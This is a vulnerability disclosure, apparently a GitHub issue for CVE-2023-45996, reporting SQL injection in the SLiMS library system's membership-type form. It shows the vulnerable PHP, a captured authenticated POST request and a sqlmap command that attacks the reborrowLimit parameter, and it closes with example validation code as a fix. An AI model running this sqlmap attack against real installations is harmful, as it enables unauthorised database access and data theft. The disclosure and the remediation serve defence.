CVE-2023-45996: Vuln0wned Report: SQL Injection in member_type.php · Issue #216 · slims/slims9_bulian

SQL injection vulnerability in Senayan Library Management Systems Slims v.9 and Bulian v.9.6.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the reborrowLimit parameter in the member_type.php.

The Bug

A SQL injection was found in admin/modules/membership/member_type.php, in the code below:

$data['member_type_name'] = $dbs->escape_string($memberTypeName);
$data['loan_limit'] = trim($_POST['loanLimit']);
$data['loan_periode'] = trim($_POST['loanPeriode']);
$data['enable_reserve'] = $_POST['enableReserve'];
$data['reserve_limit'] = $_POST['reserveLimit'];
$data['member_periode'] = $_POST['memberPeriode'];
$data['reborrow_limit'] = $_POST['reborrowLimit'];
$data['fine_each_day'] = $_POST['fineEachDay'];
$data['grace_periode'] = $_POST['gracePeriode'];
$data['input_date'] = date('Y-m-d');
$data['last_update'] = date('Y-m-d');

To Reproduce

Steps to reproduce the behavior:

  1. Log in as admin or as a user that has access to membership type

  2. Make sure the Burp application is turned on to capture the request, as in the screenshot below

  3. Save the request in a separate file (sample.reg)
    sample.reg example

POST /slims9_bulian-9.6.1/admin/modules/membership/member_type.php?itemID=2&detail=true&ajaxload=1& HTTP/1.1
Host: localhost
Content-Length: 1420
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQUBKpazqdLdsHspa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=membership
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SenayanAdmin=f5581i7ero1b1mitlh328upvmt; admin_logged_in=1; SenayanMember=37qocaml59lu0snk1tt3n74qgn
Connection: close

------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="csrf_token"

29ad9eb49edd5718652dff82f33e7ecb4000e5f376eac9d52346c6843c5b9d16
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="form_name"

mainForm
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="memberTypeName"

abcdef
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="loanLimit"

0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="loanPeriode"

0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="enableReserve"

1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="reserveLimit"

0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="memberPeriode"

1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="reborrowLimit"

4423
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="fineEachDay"

1
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="gracePeriode"

0
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="saveData"

Update
------WebKitFormBoundaryQUBKpazqdLdsHspa
Content-Disposition: form-data; name="updateRecordID"

2
------WebKitFormBoundaryQUBKpazqdLdsHspa--

  4. Run the test with the following command:

sqlmap -r example.req --level 5 --risk 3 -p reborrowLimit --random-agent --dbms=mysql --current-user

  5. You’ve entered into the system

Versions

  • OS: Windows
  • Browser: Brave Browser | Version 1.57.57 Chromium: 116.0.5845.163 (Official Build) (64-bit)
  • Slims Version: slims9_bulian-9.6.1
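
The snippet under "The Bug" escapes only memberTypeName and copies the remaining POST fields, including reborrowLimit, into $data as raw request text. As an added example (not code from the issue or from SLiMS), one way to validate those fields as bounded integers before they reach the query; the function name validate_member_type_input and the MAX_VALUE bound are assumptions.

```php
<?php
// Added example, not SLiMS code. Field and column names come from the
// snippet on this page; the function name and MAX_VALUE are assumptions.
const MAX_VALUE = 100000; // assumed upper bound for every numeric field

function validate_member_type_input(array $post): array
{
    // POST field => [column, minimum, maximum]
    $intFields = [
        'loanLimit'     => ['loan_limit', 0, MAX_VALUE],
        'loanPeriode'   => ['loan_periode', 0, MAX_VALUE],
        'enableReserve' => ['enable_reserve', 0, 1],
        'reserveLimit'  => ['reserve_limit', 0, MAX_VALUE],
        'memberPeriode' => ['member_periode', 0, MAX_VALUE],
        'reborrowLimit' => ['reborrow_limit', 0, MAX_VALUE],
        'fineEachDay'   => ['fine_each_day', 0, MAX_VALUE],
        'gracePeriode'  => ['grace_periode', 0, MAX_VALUE],
    ];
    $data = [];
    foreach ($intFields as $field => [$column, $min, $max]) {
        $raw = $post[$field] ?? null;
        // Arrays (name[]=...) and missing fields are rejected outright.
        $value = is_string($raw)
            ? filter_var(trim($raw), FILTER_VALIDATE_INT,
                ['options' => ['min_range' => $min, 'max_range' => $max]])
            : false;
        if ($value === false) {
            throw new InvalidArgumentException("Invalid value for $field");
        }
        $data[$column] = $value; // a PHP int, no longer request text
    }
    return $data;
}

// Constructed input: the field values from the captured request above.
$ok = ['loanLimit' => '0', 'loanPeriode' => '0', 'enableReserve' => '1',
       'reserveLimit' => '0', 'memberPeriode' => '1',
       'reborrowLimit' => '4423', 'fineEachDay' => '1', 'gracePeriode' => '0'];
var_dump(validate_member_type_input($ok)['reborrow_limit']);

// Constructed input: the same request with non-numeric text appended.
$bad = ['reborrowLimit' => "4423 OR 1=1"] + $ok;
try {
    validate_member_type_input($bad);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

Binding the validated values through a prepared statement, rather than concatenating them into the SQL string, keeps the query safe even if one of these fields is later changed to accept text.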
